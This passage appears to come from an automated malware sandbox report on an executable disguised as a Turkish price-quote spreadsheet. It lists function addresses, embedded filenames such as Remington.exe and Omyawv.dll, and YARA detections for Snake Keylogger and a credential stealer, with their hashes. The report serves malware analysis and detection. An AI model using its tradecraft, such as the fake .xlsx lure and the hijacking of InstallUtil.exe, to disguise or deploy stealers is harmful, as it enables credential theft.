                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B00404_2_054B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF8034_2_054BF803
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B00064_2_054B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B50184_2_054B5018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF8104_2_054BF810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BD0F84_2_054BD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEB084_2_054BEB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B93284_2_054B9328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B0B204_2_054B0B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B0B304_2_054B0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B8B904_2_054B8B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF3A84_2_054BF3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054B8BA04_2_054B8BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BF3B84_2_054BF3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BE24B4_2_054BE24B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_054BEAF84_2_054BEAF8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00ABC8F86_2_00ABC8F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB69786_2_00AB6978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB1BA86_2_00AB1BA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB4E286_2_00AB4E28
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB69686_2_00AB6968
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB22C86_2_00AB22C8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00ABFA486_2_00ABFA48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB1C186_2_00AB1C18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB8DEC6_2_00AB8DEC
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB6DF76_2_00AB6DF7
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB85306_2_00AB8530
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB85406_2_00AB8540
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB6E086_2_00AB6E08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB4E186_2_00AB4E18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_00AB8F606_2_00AB8F60
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FECCD86_2_04FECCD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE142C6_2_04FE142C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE46206_2_04FE4620
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEC05B6_2_04FEC05B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE00406_2_04FE0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FECCC96_2_04FECCC9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE46116_2_04FE4611
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE2FB86_2_04FE2FB8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE2FA96_2_04FE2FA9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEB7686_2_04FEB768
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FEB7586_2_04FEB758
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE5F486_2_04FE5F48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE5F2A6_2_04FE5F2A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_04FE001C6_2_04FE001C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051B00066_2_051B0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051B00406_2_051B0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051EC7106_2_051EC710
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E89286_2_051E8928
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E54F16_2_051E54F1
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E00066_2_051E0006
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E00406_2_051E0040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E93C96_2_051E93C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051EDD086_2_051EDD08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051E89186_2_051E8918
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051ECA376_2_051ECA37
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FCF106_2_051FCF10
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051F73186_2_051F7318
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FC2286_2_051FC228
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FCEFF6_2_051FCEFF
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FE8986_2_051FE898
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FE8A06_2_051FE8A0
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_051FC2186_2_051FC218
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05221D186_2_05221D18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522CF686_2_0522CF68
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052289886_2_05228988
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05224BE86_2_05224BE8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05221D086_2_05221D08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05223C406_2_05223C40
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522F9616_2_0522F961
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522F9706_2_0522F970
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052289786_2_05228978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522D8F96_2_0522D8F9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_05224BD86_2_05224BD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0522DA326_2_0522DA32
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052C08D86_2_052C08D8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052C5BE96_2_052C5BE9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052C5BF86_2_052C5BF8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_052C08C96_2_052C08C9
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0543E0486_2_0543E048
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_054200406_2_05420040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_054200236_2_05420023
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 6_2_0543D3D86_2_0543D3D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAD2787_2_02BAD278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BA53627_2_02BA5362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAA0887_2_02BAA088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BA71187_2_02BA7118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAC1487_2_02BAC148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAC7387_2_02BAC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAC4687_2_02BAC468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BACA087_2_02BACA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BA69B07_2_02BA69B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAE9887_2_02BAE988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BACFAA7_2_02BACFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BACCD87_2_02BACCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAF6317_2_02BAF631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAFA887_2_02BAFA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BA29E07_2_02BA29E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BAE97A7_2_02BAE97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_02BA3E097_2_02BA3E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676E6B07_2_0676E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06761E807_2_06761E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06760B307_2_06760B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067617A07_2_067617A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067650287_2_06765028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06769C187_2_06769C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067629687_2_06762968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067695487_2_06769548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06761E707_2_06761E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676E2587_2_0676E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676E2497_2_0676E249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676DE007_2_0676DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676EAF87_2_0676EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676E6AF7_2_0676E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676EF607_2_0676EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676EF517_2_0676EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06760B207_2_06760B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067693287_2_06769328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676EB087_2_0676EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676F3B87_2_0676F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06768BA07_2_06768BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676F3A87_2_0676F3A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06768B907_2_06768B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676178F7_2_0676178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676FC687_2_0676FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067600407_2_06760040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676F8107_2_0676F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067650187_2_06765018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_067600077_2_06760007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676F8017_2_0676F801
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676D0F87_2_0676D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676CCA07_2_0676CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676CC8F7_2_0676CC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676D5507_2_0676D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676295A7_2_0676295A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676D5407_2_0676D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676DDFF7_2_0676DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676D9A87_2_0676D9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0676D9997_2_0676D999
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeBinary or memory string: OriginalFilename vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061854644.0000000005950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOmyawv.dll" vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2042179735.00000000014CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000000.2030872776.0000000000C52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTEKL0 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.0000000004478000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOmyawv.dll" vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeBinary or memory string: OriginalFilenameTEKL0 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
